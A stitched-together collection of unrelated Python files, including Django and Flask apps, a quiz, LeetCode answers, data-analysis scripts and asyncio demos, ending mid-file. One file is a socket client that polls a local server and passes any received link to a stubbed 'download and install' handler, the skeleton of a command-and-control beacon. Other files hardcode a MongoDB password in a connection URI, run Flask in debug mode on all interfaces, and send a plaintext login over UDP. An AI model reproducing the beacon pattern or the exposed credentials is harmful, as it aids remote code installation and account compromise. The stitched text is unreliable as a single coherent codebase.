if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias, summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_travel_summary(self, custom_daterange = False):
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_days_travel_away_from_home':
val = (todays_data.cum_days_travel_away_from_home -
current_data.cum_days_travel_away_from_home)
return val
elif key == "prcnt_days_travel_away_from_home":
val = self._get_average_for_duration(
todays_data.cum_days_travel_away_from_home,
current_data.cum_days_travel_away_from_home,alias
) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
return None
calculated_data = {
'number_days_travel_away_from_home':{d:None for d in self.duration_type},
'prcnt_days_travel_away_from_home':{d:None for d in self.duration_type}
}
summary_type = "travel_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def _cal_standing_summary(self, custom_daterange = False):
def _calculate(key,alias,todays_data,current_data,
todays_meta_data,current_meta_data):
if todays_data and current_data:
if key =='number_days_stood_three_hours':
val = (todays_data.cum_days_stand_three_hour -
current_data.cum_days_stand_three_hour)
return val
elif key == "prcnt_days_stood_three_hours":
if todays_meta_data and current_meta_data:
days_reported_stood_not_stood_three_hours = (
todays_meta_data.cum_reported_stand_three_hours_days_count -
current_meta_data.cum_reported_stand_three_hours_days_count
)
val = (todays_data.cum_days_stand_three_hour -
current_data.cum_days_stand_three_hour)
if days_reported_stood_not_stood_three_hours:
val = (val/days_reported_stood_not_stood_three_hours) * 100
return int(Decimal(val).quantize(0,ROUND_HALF_UP))
else:
return 0
elif key == "number_days_reported_stood_not_stood_three_hours":
days_reported_stood_not_stood_three_hours = (
todays_meta_data.cum_reported_stand_three_hours_days_count -
current_meta_data.cum_reported_stand_three_hours_days_count
)
return days_reported_stood_not_stood_three_hours
return None
calculated_data = {
'number_days_stood_three_hours':{d:None for d in self.duration_type},
'prcnt_days_stood_three_hours':{d:None for d in self.duration_type},
'number_days_reported_stood_not_stood_three_hours':{d:None for d in self.duration_type}
}
summary_type = "standing_cum"
if custom_daterange:
alias = "custom_range"
for key in calculated_data.keys():
calculated_data[key][alias] = self._generic_custom_range_calculator(
key, alias,summary_type, _calculate
)
if self.current_date:
self._generic_summary_calculator(calculated_data,_calculate,summary_type)
return calculated_data
def get_progress_report(self):
# Driver method to generate and return PA reports
SUMMARY_CALCULATOR_BINDING = self._get_summary_calculator_binding()
DATA = {'summary':{}, "report_date":None}
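        # Resulting shape (dates illustrative; duration_date is only filled in
        # when self.current_date is set):
        # {
        #     "summary": {"exercise": {...}, "sick": {...}, ...},
        #     "duration_date": {"today": "2020-01-07",
        #                       "week": "2020-01-01 to 2020-01-06", ...},
        #     "report_date": "2020-01-07"
        # }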
for summary in self.summary_type:
DATA['summary'][summary] = SUMMARY_CALCULATOR_BINDING[summary](self.custom_daterange)
if self.current_date:
duration = self._get_duration_datetime(self.current_date)
duration_dt = {}
for dur in self.duration_type:
if dur == 'today' or dur == 'yesterday':
duration_dt[dur] = duration[dur].strftime("%Y-%m-%d")
else:
dt_str = (duration[dur] + timedelta(days=1)).strftime("%Y-%m-%d") +\
" to " + duration['yesterday'].strftime("%Y-%m-%d")
duration_dt[dur] = dt_str
DATA['duration_date'] = duration_dt
DATA['report_date'] = self.current_date.strftime("%Y-%m-%d")
return DATA
|
# -*- coding: utf-8 -*-
from collections import Counter
class Solution:
def maxNumberOfBalloons(self, text):
counts = Counter(text)
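        # "balloon" needs one b, one a, one n and two each of l and o,
        # hence the // 2 on the l and o counts.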
return min(
counts["b"], counts["a"], counts["l"] // 2, counts["o"] // 2, counts["n"]
)
if __name__ == "__main__":
solution = Solution()
assert 1 == solution.maxNumberOfBalloons("nlaebolko")
assert 2 == solution.maxNumberOfBalloons("loonbalxballpoon")
assert 0 == solution.maxNumberOfBalloons("leetcode")
|
import socket
import time
import urllib.request
obj = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
time_per_signal = 5
addr = ("127.0.0.1",5883)
class handlers:
def nothing():
return "nothing"
def activate(link):
#Download and install
return "nothing"
def connect_to(obj, addr):
    # Keep retrying until the server accepts the connection.
    while True:
        try:
            obj.connect(addr)
            break
        except OSError:
            time.sleep(3)
            continue
    check_loop(obj, addr)
def check_loop(obj, addr):
    while True:
        try:
            obj.send(b"update")
            data = obj.recv(4096).decode()
            if data == "nothing":
                handlers.nothing()
            elif "link: " in data:
                link = data[6:]
                handlers.activate(link)
            else:
                continue
            time.sleep(time_per_signal)
        except Exception as e:
            # str(e) is needed: "in" cannot test containment on the
            # exception object itself.
            if "Broken pipe" in str(e):
                break
    # A socket cannot be reused once the connection has broken, so open a
    # fresh one before reconnecting.
    obj.close()
    new_obj = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    connect_to(new_obj, addr)
connect_to(obj, addr)
|
def run_quiz(question_list, option_list, ans_list):
    # ans_list holds the expected option number (1-based) for each question.
    i = 0
    while i < len(question_list):
        print(question_list[i])
        j = 0
        while j < len(option_list[i]):
            print(j + 1, option_list[i][j])
            j = j + 1
        def check_answer(ans):
            if ans == ans_list[i]:
                print("correct", ans)
            else:
                print("wrong", ans)
        check_answer(int(input("your answer (option number): ")))
        i = i + 1
question_list = ["how many continents are there?",
                 "what is the capital of india?",
                 "which course is taught at ng?"]
option_list = [["four", "nine", "seven", "eight"],
               ["chandigarh", "bhopal", "chennai", "delhi"],
               ["software engineering", "counseling tourism", "agriculture"]]
ans_list = [2, 1, 4]
run_quiz(question_list, option_list, ans_list)
|
# Simple linear regression: least-squares slope (b1) and intercept (b0)
# computed by hand, without any external libraries.
input_x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
input_y = [10, 11, 12, 13, 14, 15, 16, 17, 18, 19]
class regression:
    def __init__(self, x=None, y=None):
        self.x = x or []
        self.y = y or []
    def mean_x(self):
        return sum(self.x) / len(self.x)
    def mean_y(self):
        return sum(self.y) / len(self.y)
    def gradient_b1(self):
        # b1 = sum((x_i - mean_x) * (y_i - mean_y)) / sum((x_i - mean_x)**2)
        mean_x = self.mean_x()
        mean_y = self.mean_y()
        numerator = 0
        denominator = 0
        for xi, yi in zip(self.x, self.y):
            numerator += (xi - mean_x) * (yi - mean_y)
            denominator += (xi - mean_x) ** 2
        return numerator / denominator
    def gradient_b0(self):
        # b0 = mean_y - b1 * mean_x
        return self.mean_y() - self.gradient_b1() * self.mean_x()
test = regression(input_x, input_y)
print(test.x)
print(test.y)
print(test.mean_x())
print(test.gradient_b1())
print(test.gradient_b0())
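# For this data y = x + 9 exactly, so the printed slope (b1) is 1.0 and the
# intercept (b0) is 9.0.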
|
"""
Example program for receiving gesture events and accelerometer readings from Kai
"""
import os
import time
import configparser
from KaiSDK.WebSocketModule import WebSocketModule
from KaiSDK.DataTypes import KaiCapabilities
import KaiSDK.Events as Events
from pythonosc.dispatcher import Dispatcher
from pythonosc.udp_client import SimpleUDPClient
dispatcher = Dispatcher()
client = SimpleUDPClient("127.0.0.1", 1337)
def gestureEvent(ev):
gestureString = ev.gesture
if (str(gestureString) == "Gesture.swipeUp"):
client.send_message("/gesture", 1)
elif (str(gestureString) == "Gesture.swipeDown"):
client.send_message("/gesture", 2)
elif (str(gestureString) == "Gesture.swipeLeft"):
client.send_message("/gesture", 3)
elif (str(gestureString) == "Gesture.swipeRight"):
client.send_message("/gesture", 4)
def pyrEv(ev):
client.send_message("/pitch", ev.pitch)
client.send_message("/yaw", ev.yaw)
client.send_message("/roll", ev.roll)
def quatEv(ev):
client.send_message("/quatW", ev.quaternion.w)
client.send_message("/quatX", ev.quaternion.x)
client.send_message("/quatY", ev.quaternion.y)
client.send_message("/quatZ", ev.quaternion.z)
def fingersEv(ev):
client.send_message("/littleFinger", ev.littleFinger)
client.send_message("/ringFinger", ev.ringFinger)
client.send_message("/middleFinger", ev.middleFinger)
client.send_message("/indexFinger", ev.indexFinger)
# Use your module's ID and secret here
config = configparser.ConfigParser()
config.read("config.ini")
moduleID = "12345"
moduleSecret = "qwerty"
# Create a WS module and connect to the SDK
module = WebSocketModule()
success = module.connect(moduleID, moduleSecret)
if not success:
print("Unable to authenticate with Kai SDK")
exit(1)
# Set the default Kai to record gestures and accelerometer readings
module.setCapabilities(module.DefaultKai, KaiCapabilities.GestureData | KaiCapabilities.PYRData | KaiCapabilities.QuaternionData | KaiCapabilities.FingerShortcutData)
# Register event listeners
module.DefaultKai.register_event_listener(Events.GestureEvent, gestureEvent)
module.DefaultKai.register_event_listener(Events.PYREvent, pyrEv)
module.DefaultKai.register_event_listener(Events.QuaternionEvent, quatEv)
module.DefaultKai.register_event_listener(Events.FingerShortcutEvent, fingersEv)
# module.DefaultKai.register_event_listener(Events.AccelerometerEvent, accelerometerEv)
# module.DefaultKai.register_event_listener(Events.GyroscopeEvent, gyroscopeEv)
# module.DefaultKai.register_event_listener(Events.MagnetometerEvent, magnetEv)
#time.sleep(30) # Delay for testing purposes
# Save Kai battery by unsetting capabilities which are not required anymore
# module.unsetCapabilities(module.DefaultKai, KaiCapabilities.AccelerometerData)
#time.sleep(30)
#module.close()
# ws://localhost:2203
# {"type": "authentication", "moduleId": "test", "moduleSecret": "qwerty"}
# {"type": "setCapabilities", "fingerShortcutData": true}
|
from decimal import Decimal
from django.conf import settings
from books.models import Book
from operator import itemgetter
class Cart(object):
def __init__(self, request):
"""
Initialize the cart.
"""
self.session = request.session
cart = self.session.get(settings.CART_SESSION_ID)
if not cart: # save an empty cart in the session
cart = self.session[settings.CART_SESSION_ID] = {}
self.cart = cart
def add(self, book):
"""
Add a book to the cart.
"""
book_pk = str(book.pk)
if book_pk not in self.cart:
            # Because the seller might change the price of the book, we store the current price.
self.cart[book_pk] = {'price': str(book.price)}
self.save()
def save(self):
self.session.modified=True
def remove(self, book):
"""
Remove a book from the cart.
"""
book_pk = str(book.pk)
if book_pk in self.cart:
del self.cart[book_pk]
self.save()
def __iter__(self):
"""
Iterate over the items in the cart and get the book from the databases.
"""
book_pks = self.cart.keys()
#get the book objects and add them to the cart.
books = Book.objects.filter(pk__in=book_pks)
cart = self.cart.copy()
for book in books:
cart[str(book.pk)]['book'] = book
cart[str(book.pk)]['price'] = book.price
cart[str(book.pk)]['seller'] = book.seller
for item in cart.values():
item['price']=Decimal(item['price'])
yield item
def __len__(self):
"""
Count all items in the cart.
"""
return len(self.cart.values())
def get_total_price(self):
'''
cart_list = []
for k,v in self.cart.items():
cart_list.append(v)
grouper = ['seller']
key=itemgetter(*str(grouper))
cart_list.sort(key=key)
cart_list = [{**dict(zip(grouper, k)), 'price' : sum(Decimal(map(itemgetter('price')),g))} for k,g in groupby(l,key=key)]
print(cart_list)
'''
return sum(Decimal(item['price']) for item in self.cart.values())
def clear(self):
#remove cart from session
del self.session[settings.CART_SESSION_ID]
self.save()
def offer_total_price(self, offer_price):
return offer_price
def __str__(self):
return str(self.__class__) + ": " + str(self.__dict__)
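# Hedged sketch (not used by the Cart class above): a per-seller subtotal along the
# lines the commented-out block in get_total_price appears to aim for. It assumes the
# item dicts produced by Cart.__iter__, which carry 'seller' and Decimal 'price' keys.
def totals_by_seller(cart):
    totals = {}
    for item in cart:
        totals[item['seller']] = totals.get(item['seller'], Decimal('0')) + item['price']
    return totals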
|
#!/usr/bin/env python
# This script will get the highest UID available under 500
import subprocess
uid_list = []
unique_uid = []
cmd = ["dscacheutil", "-q", "user"]
output = subprocess.Popen(cmd, stdout=subprocess.PIPE, universal_newlines=True)\
    .stdout.readlines()
for _ in output:
if "uid" in _:
uid_list.append(_.strip().split(' ')[-1])
for _ in uid_list:
if _ not in unique_uid:
unique_uid.append(_)
unique_uid.sort(key=int)
uid = 499
uuid = False
while not uuid:
    if str(uid) in unique_uid:
        uid -= 1
    else:
        uuid = True
print("\n\tUnique ID: %s\n" % uid)
|
#!/usr/bin/python3
#
# Send a String message from command line to an AMQP queue or topic
#
# Useful for testing messaging applications
#
# To install the dependencies:
#
# Debian / Ubuntu:
# apt install python3-qpid-proton
#
# RPM:
# dnf install qpid-python
#
# See README_AMQP_Apache_Qpid_Proton.txt
#
# Copyright (c) 2022 Software Freedom Institute SA https://softwarefreedom.institute
# Copyright (c) 2022 Daniel Pocock https://danielpocock.com
#
from __future__ import print_function, unicode_literals
import optparse
from proton import Message
from proton.handlers import MessagingHandler
from proton.reactor import Container
import sys
class Send(MessagingHandler):
def __init__(self, url, msg_body, wait_response):
super(Send, self).__init__()
self.url = url
self.msg_body = msg_body
self.msg_ready = True
self.wait_response = wait_response
def on_start(self, event):
self.sender = event.container.create_sender(self.url)
if self.wait_response:
print("creating receiver for request/response operation")
print("request/response requires recent version of qpid-proton client library")
print("request/response is not supported in all AMQP brokers,")
print("This has been tested successfully on Apache qpidd")
self.receiver = event.container.create_receiver(self.sender.connection, None, dynamic=True)
def on_sendable(self, event):
if event.sender.credit and self.msg_ready:
print ("sending : %s" % (self.msg_body,))
#msg = Message(body=self.msg_body, inferred=True)
if self.wait_response:
if self.receiver.remote_source.address:
_reply_to = self.receiver.remote_source.address
else:
print("request/response mode enabled but we don't have a reply-to address")
sys.exit(1)
else:
_reply_to = None
if sys.version < '3':
msg = Message(body=unicode(self.msg_body, "utf-8"), reply_to=_reply_to)
else:
msg = Message(body=self.msg_body, reply_to=_reply_to)
event.sender.send(msg)
self.msg_ready = False
print("sent")
def on_accepted(self, event):
print("message confirmed")
if self.wait_response:
print("waiting for response on %s" % (self.receiver.remote_source.address,))
# FIXME - add a timeout?
else:
event.connection.close()
def on_message(self, event):
print("response: %s" % (event.message.body,))
event.connection.close()
def on_disconnected(self, event):
print("Disconnected")
parser = optparse.OptionParser(usage="usage: %prog [options]",
description="Send messages to the supplied address.")
parser.add_option("-a", "--address", default="localhost:5672/examples",
help="address to which messages are sent (default %default)")
parser.add_option("-m", "--message", default="Hello World",
help="message text")
parser.add_option("-r", "--response", default=False,
help="wait for a response", action="store_true")
opts, args = parser.parse_args()
try:
Container(Send(opts.address, opts.message, opts.response)).run()
except KeyboardInterrupt:
pass
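# Example invocations (hypothetical script name and broker address; adjust to your setup):
#   ./send_amqp.py -a localhost:5672/examples -m "Hello World"
#   ./send_amqp.py -a localhost:5672/examples -m "ping" -r    # request/response mode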
|
from flask import Flask, render_template, request, redirect
from pymongo import MongoClient
from bson import ObjectId
client = MongoClient('mongodb://user:As1234@ds245971.mlab.com:45971/catpedia')
db = client['catpedia']
cat_collection = db['cats']
app = Flask(__name__)
@app.route('/')
def index():
cats = list(cat_collection.find())
return render_template('index.html', cats=cats)
@app.route('/cat')
def details():
id = request.args.get('id', '')
if not id:
return "404"
cat = cat_collection.find_one({"_id": ObjectId(id)})
return render_template('details.html', cat=cat)
@app.route('/add')
def add():
name = request.args.get('name', '')
description = request.args.get('description', '')
image = request.args.get('image', '')
if name and description and image:
cat = {
"name": name,
"description": description,
"image": image
}
cat_collection.insert_one(cat)
return redirect('/cat?id='+str(cat['_id']))
return render_template('add.html')
app.run(debug=True, port=8082, host='0.0.0.0')
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-06-10 12:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('k8sproject', '0005_auto_20180610_1954'),
]
operations = [
migrations.CreateModel(
name='result',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('result_from_api_name', models.TextField(max_length=10240, verbose_name='\u6240\u6709\u8fd4\u8fd8\u7ed3\u679c')),
],
options={
'verbose_name': '\u8fd4\u8fd8\u7ed3\u679c',
'verbose_name_plural': '\u8fd4\u8fd8\u7ed3\u679c',
},
),
migrations.RenameModel(
old_name='all_result_info',
new_name='namespace',
),
migrations.AlterModelOptions(
name='namespace',
options={'verbose_name': '\u547d\u540d\u7a7a\u95f4', 'verbose_name_plural': '\u547d\u540d\u7a7a\u95f4'},
),
migrations.RemoveField(
model_name='all_api_for_k8s',
name='namespace_type',
),
migrations.RemoveField(
model_name='all_api_for_k8s',
name='result_from_api_name',
),
migrations.AddField(
model_name='result',
name='api',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='k8sproject.namespace'),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 9 10:23:54 2020
@author: Alex
"""
import numpy as np
import matplotlib.pyplot as plt
from Analysis_Methods import NLL_1
from Univariate import univariate
#Import the univariate method and apply it to minimise the mass first
#Extract the function minima, the curvature, and the standard deviation estimate
extract = univariate(0.5, 0.6, 0.7, 0.0021, 0.0023, 0.0025, NLL_1, c=1)
#Print the final result for this method
print("theta, del_m = ", extract[0:2])
print("sig_theta, sig_m = ", extract[4:])
|
import random
def play():
    user = input("rock press 'r', paper press 'p', scissors press 's'\n")
    user = user.lower()
    computer = random.choice(["r", "p", "s"])
    if user == computer:
        return "it's a tie, you have both chosen {}".format(user)
    if win(user, computer):
        return "you have won, you chose {} and the computer chose {}".format(user, computer)
    return "you have lost, you chose {} and the computer chose {}".format(user, computer)
def win(player, opponent):
if (player == "r" and opponent == "s") or (player =="p" and opponent == "r") or (player == "s" and opponent=="p"):
#return " you have won, you have choosen {} the computer has choosen {}"
return True
return False
if __name__ == "__main__":
print(play())
def multiply(a, b):
    return a * b
|
# -*- coding: utf-8 -*-
#Relational Operators
x = 2
y = 3
#Equal == : we use the equality operator to check whether two values are equal
print(x == y) #x is 2 and y is 3, so the result is False, because 2 is not equal to 3
#Not equal != : we use the inequality operator to check whether two values are different
print(x != y) #x is 2 and y is 3, so the result is True, because 2 is different from 3
#Greater than > : we use it to check whether one value is greater than the other
print(x > y) #x is 2 and y is 3, so the result is False, because 2 is less than 3
#Less than < : we use it to check whether one value is less than the other
print(x < y) #x is 2 and y is 3, so the result is True, because 2 is less than 3
#Greater than or equal >= : we use it to check whether one value is greater than or equal to the other
print(x >= y) #x is 2 and y is 3, so the result is False, because 2 is less than 3
#Less than or equal <= : we use it to check whether one value is less than or equal to the other
print(x <= y) #x is 2 and y is 3, so the result is True, because 2 is less than 3
""" Try some tests:
Run the commands below:
print(1 == 1)
print(3 >= 2)
print(5 <= 6)
print(2 >= 1)
"""
input("Pressione qualquer tecla para continuar")
|
'''program to input a multidigit no. and
1)print sum
2)print the reverse number
3)check whether the given no. is a palindrome '''
n=input("Enter A Multidigit Number:")
i=1
s=0
while n>i:
f=i*10
x=(n%f)
x=x/i
s=s+x
i*=10
print 'Sum Of The Digits Is', s
m=n
r=0
while n!=0:
d=n%10
r=r*10+d
n=n/10
print'The Reverse of the no. is', r
if m==r:
print'It is a palindrome'
else:
print'It is not a palindrome'
|
## Script (Python) "getPastasRaiz"
##bind container=container
##bind context=context
##bind namespace=
##bind script=script
##bind subpath=traverse_subpath
##parameters=
##title=
##
path={ "query": "/automator", 'depth': 1 }
pastas = context.portal_catalog.searchResults(Type=['Folder'], sort_on="getObjPositionInParent", review_state="published", path=path)
return pastas
|
import itertools
import torch
from sklearn.neural_network import MLPRegressor
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# data = [line.strip() for line in open('/Users/ksnmurthy/research-work/data-kern/pitch-plots/data_schweiz.txt', 'r')]
data = [line.strip() for line in
open('/home/radhamanisha/RBP-codebase/data-kern/pitch-plots/data_bach.txt', 'r')]
def jaccard_similarity(x, y):
intersection_cardinality = len(set.intersection(*[set(x), set(y)]))
union_cardinality = len(set.union(*[set(x), set(y)]))
return intersection_cardinality / float(union_cardinality)
def cond_prob(x, y):
ic = len(set.intersection(*[set(x), set(y)]))
uc = len(set(y))
return ic / float(uc)
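# Quick illustrative check of the two measures above (toy values, not from the corpus):
# the sets {1,2,3} and {2,3,4} share 2 of 4 distinct elements.
assert jaccard_similarity([1, 2, 3], [2, 3, 4]) == 0.5
assert abs(cond_prob([1, 2, 3], [2, 3, 4]) - 2.0 / 3) < 1e-9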
vocab_size = list(set(data))
char_to_int = dict((c, i) for i, c in enumerate(vocab_size))
ba = [char_to_int[char] for char in data]
# split into subsequences
data_modified = zip(*[iter(ba)] * 6)
# convert into list
data_modified_list = [list(i) for i in data_modified]
inputs, targets = [], []
for i in data_modified_list:
inputs.append(i[:-1])
targets.append(i[-1:])
two_comb = []
# ba = [char_to_int[char] for char in data]
for i in inputs:
two_comb.append(list(itertools.combinations(i, 2)))
# diff = [abs(x-y) for x,y in two_comb]
two_comb_list = [list(i) for i in two_comb]
diff = []
for i in two_comb_list:
diff.append([abs(x - y) for x, y in i])
# diff = [abs(x-y) for x,y in two_comb]
# get binary differences
diff_binary = []
for row in diff:
    for v in row:
        diff_binary.append(0 if v == 0 else 1)
# model = MLPRegressor()
# model.fit(two_comb_list,diff_binary)
print(diff_binary[:1])
count_zero, count_one = 0, 0
for i in diff_binary:
if i == 0:
count_zero += 1
elif i == 1:
count_one += 1
# try to predict on test data
test_inputs = []
# repplicate target tensor to make it compatible with zip!!!
test1 = [[i] * 5 for i in targets]
# Flat list such that each list of list merges into a single list..
flat_list = list(list(itertools.chain.from_iterable(i)) for i in test1)
for i, j in zip(inputs, flat_list):
    test_inputs.append(list(zip(i, j)))
# modify these test inputs -- tuples into lists
# flatten them again
cc = [item for sublist in test_inputs for item in sublist]
test_inputs_list = [list(c) for c in cc]
diff1 = []
for i in test_inputs:
diff1.append([abs(x - y) for x, y in i])
jack_sim = []
jc_c = []
for i, j in zip(diff, diff1):
jack_sim.append(jaccard_similarity(i, j))
for i, j in zip(diff, diff1):
jc_c.append(cond_prob(i, j))
diff_binary1 = []
for row in diff1:
    for v in row:
        diff_binary1.append(0 if v == 0 else 1)
j = jack_sim[:50]
j = np.array(j).reshape(5, 10)
jc = jc_c[:50]
jc = np.array(jc).reshape(5, 10)
plt.imshow(j, cmap=plt.cm.RdBu);
plt.title('Jaccard Similarity distribution')
plt.xlabel('DR inputs')
plt.ylabel('DR outputs')
plt.colorbar()
plt.show()
plt.imshow(jc, cmap=plt.cm.RdBu);
plt.title('Conditional probability distribution')
plt.xlabel('DR inputs')
plt.ylabel('DR outputs')
plt.colorbar()
plt.show()
# Count how often each DR-input difference position (diff, 10 positions) and each
# DR-output difference position (diff1, 5 positions) equals zero; `de` scales the
# counts for the bar plot below.
d = [0] * 15
for row in diff:
    for k, v in enumerate(row[:10]):
        d[k] += (v == 0)
for row in diff1:
    for k, v in enumerate(row[:5]):
        d[10 + k] += (v == 0)
de = [x * 0.01 for x in d]
h1 = ['DR-I1', 'DR-I2', 'DR-I3', 'DR-I4', 'DR-I5', 'DR-I6', 'DR-I7', 'DR-I8', 'DR-I9', 'DR-I10']
h2 = ['DR-O1', 'DR-O2', 'DR-O3', 'DR-O4', 'DR-O5']
y_pos = np.arange(len(h2))
print(diff_binary1[:1])
plt.title('Occurrence of DR outputs over 8 datasets')
plt.ylabel('Percentage of occurrence')
plt.xlabel('DR outputs')
plt.xticks(y_pos, h2)
plt.bar(y_pos, de[10:15], align='center', alpha=0.5)
# k = model.predict(test_inputs_list)
# coefficients = [coef.shape for coef in model.coefs_]
# print(coefficients)
# bin_diff_chunks = zip(*[iter(diff_binary)]*10)
# bin_out_chunks = zip(*[iter(k)]*5)
# final_chunks_dict = dict(zip(bin_diff_chunks,bin_out_chunks))
# keys = final_chunks_dict.keys()
# values=final_chunks_dict.values()
# get combinations of key,value
print(len(diff_binary))
print(len(diff_binary1))
drd = list(itertools.product(diff_binary[:5], diff_binary1[:5]))
# print(len(drd))
drd_arr = np.array(drd).reshape(5, 10)
# print(drd_arr)
plt.imshow(drd_arr, cmap=plt.cm.RdBu)
h1 = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
# plt.xticks(np.arange(0,9),h1)
# plt.yticks(np.arange(0,4))
plt.colorbar()
plt.show()
# flatten list of lists into one
# flat_list = [item for sublist in drd for item in sublist]
# split flatlist into two lists using zip and map
# w1, w2 = map(list,zip(*flat_list))
# create third column w3 which is for dataset
# w3 = ['Chinese']*len(w1)
# convert into panda frame
# pdd = pd.DataFrame({'DR-input':w1, 'DR-output':w2, 'dataset':w3})
# sns.factorplot(x="DR-input",y="DR-output",col="dataset", data=pdd,kind="strip", jitter=True)
|
from random import randrange
# method 1 O(n**2)
def twoNearestNum1(seq):
dd = float("Inf")
for i in seq:
for j in seq:
if i == j:
continue
d = abs(i - j)
if d < dd:
ii, jj, dd = i, j, d
return ii, jj, dd
# method 2 O(n*log(n))
def twoNearestNum2(seq):
dd = float("Inf")
seq.sort()
for i in range(len(seq) - 1):
x, y = seq[i], seq[i + 1]
if x == y:
continue
d = abs(x - y)
if d < dd:
xx, yy, dd = x, y, d
return xx, yy, dd
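# A compact variant of method 2 for reference (assumes Python 3): deduplicate, sort
# once, then take the adjacent pair with the smallest gap.
def twoNearestNum3(seq):
    s = sorted(set(seq))
    x, y = min(zip(s, s[1:]), key=lambda p: p[1] - p[0])
    return x, y, y - x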
def main():
seq = [randrange(10 ** 10) for i in range(100)]
xx, yy, dd = twoNearestNum1(seq)
print(xx, yy, dd)
xx, yy, dd = twoNearestNum2(seq)
print(xx, yy, dd)
if __name__ == "__main__":
main()
|
import asyncio
from asyncio.exceptions import CancelledError
async def producer(q):
for i in range(10):
await q.put(i)
await asyncio.sleep(0.1)
async def watcher(q, name):
while True:
task = await q.get()
print(f"{name} got {task}")
await asyncio.sleep(1)
q.task_done()
async def main():
q = asyncio.Queue()
p = asyncio.create_task(producer(q))
watchers = asyncio.gather(*[watcher(q, f"{i}") for i in range(3)])
await p
print("waiting for watchers to finish")
await q.join()
watchers.cancel()
try:
await watchers
except CancelledError:
print("watchers finished")
asyncio.run(main())
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from typing import Iterable, Mapping
from pants.core.goals.test import TestResult
from pants.engine.internals.native_engine import Address
from pants.jvm.test.junit import JunitTestFieldSet, JunitTestRequest
from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, RuleRunner
def run_junit_test(
rule_runner: RuleRunner,
target_name: str,
relative_file_path: str,
*,
extra_args: Iterable[str] | None = None,
env: Mapping[str, str] | None = None,
) -> TestResult:
args = [
"--junit-args=['--disable-ansi-colors','--details=flat','--details-theme=ascii']",
*(extra_args or ()),
]
rule_runner.set_options(args, env=env, env_inherit=PYTHON_BOOTSTRAP_ENV)
tgt = rule_runner.get_target(
Address(spec_path="", target_name=target_name, relative_file_path=relative_file_path)
)
return rule_runner.request(
TestResult, [JunitTestRequest.Batch("", (JunitTestFieldSet.create(tgt),), None)]
)
|
import os
os.chdir(os.path.dirname(__file__))
print(str(os.getcwd()))
os.system('cmd /k "python automation.py"')
|
#!/usr/bin/env python
# coding=utf-8
import numpy as np
def calc_entropy(x):
"""
calculate shanno ent of x
"""
x_value_list = set([x[i] for i in range(x.shape[0])])
ent = 0.0
for x_value in x_value_list:
p = float(x[x == x_value].shape[0]) / x.shape[0]
logp = np.log2(p)
ent -= p * logp
return ent
def calc_attrs_entropy(label_attrs):
attrs = np.array(list(label_attrs.values()))
attrs_entropy = []
for i in range(attrs.shape[1]):
entropy = calc_entropy(attrs[:, i])
if entropy > 0:
entropy = 1.0
else:
entropy = 0
attrs_entropy.append(entropy)
#print(attrs_entropy)
return attrs_entropy
def remove_low_entropy_attrs(label_attrs, entropy_thr=0.0):
label_attrs_removed = {}
valid_attr_idxes = []
attrs = np.array(list(label_attrs.values()))
print(attrs.shape[1])
for i in range(attrs.shape[1]):
entropy = calc_entropy(attrs[:, i])
print(i, entropy)
if entropy > entropy_thr:
valid_attr_idxes.append(i)
for label, attrs in label_attrs.items():
label_attrs_removed[label] = list(np.array(attrs)[valid_attr_idxes])
return label_attrs_removed, valid_attr_idxes
def remove_non_visible_attrs(label_attrs, superclass):
with open('attr_valid_idxes_%s.txt' % (superclass.lower()), 'r') as reader:
label_attrs_removed = {}
valid_attr_idxes = [int(row.strip()) - 1 for row in reader.readlines()]
for label, attrs in label_attrs.items():
label_attrs_removed[label] = list(np.array(attrs)[valid_attr_idxes])
return label_attrs_removed, valid_attr_idxes
def attrs_reduce(class_attrs_path, superclass, entropy_thr = 0):
fattrs = open(class_attrs_path, 'r', encoding='utf-8')
attrs = fattrs.readlines()
fattrs.close()
label_attrs = {}
for row in attrs:
pair = row.strip().split(',')
label_attrs[pair[0]] = list(map(lambda x: float(x), pair[1].strip().split(' ')[1:-1]))
#label_attrs, label_attrs_idxes = remove_non_visible_attrs(label_attrs, superclass)
#label_attrs, label_attrs_idxes = remove_low_entropy_attrs(label_attrs, entropy_thr)
return label_attrs
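# Illustrative check of calc_entropy on hypothetical toy attributes (not project data):
# a balanced binary attribute carries 1 bit of entropy, a constant attribute carries 0.
if __name__ == '__main__':
    print(calc_entropy(np.array([0, 1, 0, 1])))  # 1.0
    print(calc_entropy(np.array([1, 1, 1, 1])))  # 0.0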
|
from brain_games.games import progression
from brain_games import engine
def main():
engine.run(game=progression)
|
import socket
import sys
# Create a UDP socket
messages = ["HELP", "LOGIN MTECH GITRDONE", "STATUS", "START", "STOP", "LOGOUT"]
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (sys.argv[1], 4547)
commands = []
commands.append(sys.argv[2])
if len(sys.argv) > 3:
commands.append(sys.argv[3])
for command in commands:
if command in messages:
sent = sock.sendto(command, server_address)
data, server = sock.recvfrom(4096)
print data
|
import time
import json
import paho.mqtt.client as mqtt
def pluie(client, boule,dt):
cmds=[]
cmds1=[]
rings = [2,1,0]
for i in rings :
cmd = {
'command': 'set_ring',
'ring': i,
